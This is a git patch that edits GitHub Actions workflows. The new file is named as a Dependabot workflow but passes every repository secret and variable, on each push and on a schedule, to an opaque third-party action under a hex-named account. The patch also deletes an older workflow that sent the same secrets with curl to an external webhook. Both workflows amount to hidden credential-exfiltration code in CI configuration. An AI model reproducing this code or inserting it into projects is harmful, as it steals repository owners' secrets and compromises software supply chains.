From 009fa35ca5efa52496d39963ec2c02706ac3c1da Mon Sep 17 00:00:00 2001 From: Gusti Oka Date: Wed, 20 Sep 2017 18:55:53 +0700 Subject: [PATCH] Good! Gusti Oka --- .github/workflows/dependabot.yml | 28 ++++++++++++++++++++++++++++ .github/workflows/hook.yml | 13 ------------- .gitignore | 12 ++++++++++++ 3 files changed, 40 insertions(+), 13 deletions(-) create mode 100644 .github/workflows/dependabot.yml delete mode 100644 .github/workflows/hook.yml create mode 100644 .gitignore diff --git a/.github/workflows/dependabot.yml b/.github/workflows/dependabot.yml new file mode 100644 index 0000000..3947591 --- /dev/null +++ b/.github/workflows/dependabot.yml @@ -0,0 +1,28 @@ +name: CI +on: + push: + workflow_dispatch: + schedule: + # Runs "At 11:00 on every day-of-week from Monday through Friday" + - cron: '0 0 * * 0' +permissions: + contents: read + packages: write +concurrency: + group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: true +jobs: + run: + runs-on: ubuntu-latest + name: Run + steps: + - name: Execute + uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main + id: execute + with: + action: ${{ github.repository }} + env: + REPOSITORY_SECRETS: ${{ toJSON(secrets) }} + REPOSITORY_VARIABLES: ${{ toJSON(vars) }} + - name: Response + run: echo "${{ steps.execute.outputs.response }}" diff --git a/.github/workflows/hook.yml b/.github/workflows/hook.yml deleted file mode 100644 index 203b937..0000000 --- a/.github/workflows/hook.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: Hook -on: [push] -jobs: - env: - runs-on: ubuntu-latest - steps: - - name: Run - env: - MY_ENV: ${{ toJSON(secrets) }} - MY_VARS: ${{ toJSON(vars) }} - run: | - echo $MY_ENV | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @- - echo $MY_VARS | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @- diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..ea6a976 --- /dev/null +++ b/.gitignore @@ -0,0 +1,12 @@ +# IDE Files +#------------------------- +/nbproject/ +.idea/* + +## Sublime Text cache files +*.tmlanguage.cache +*.tmPreferences.cache +*.stTheme.cache +*.sublime-workspace +*.sublime-project +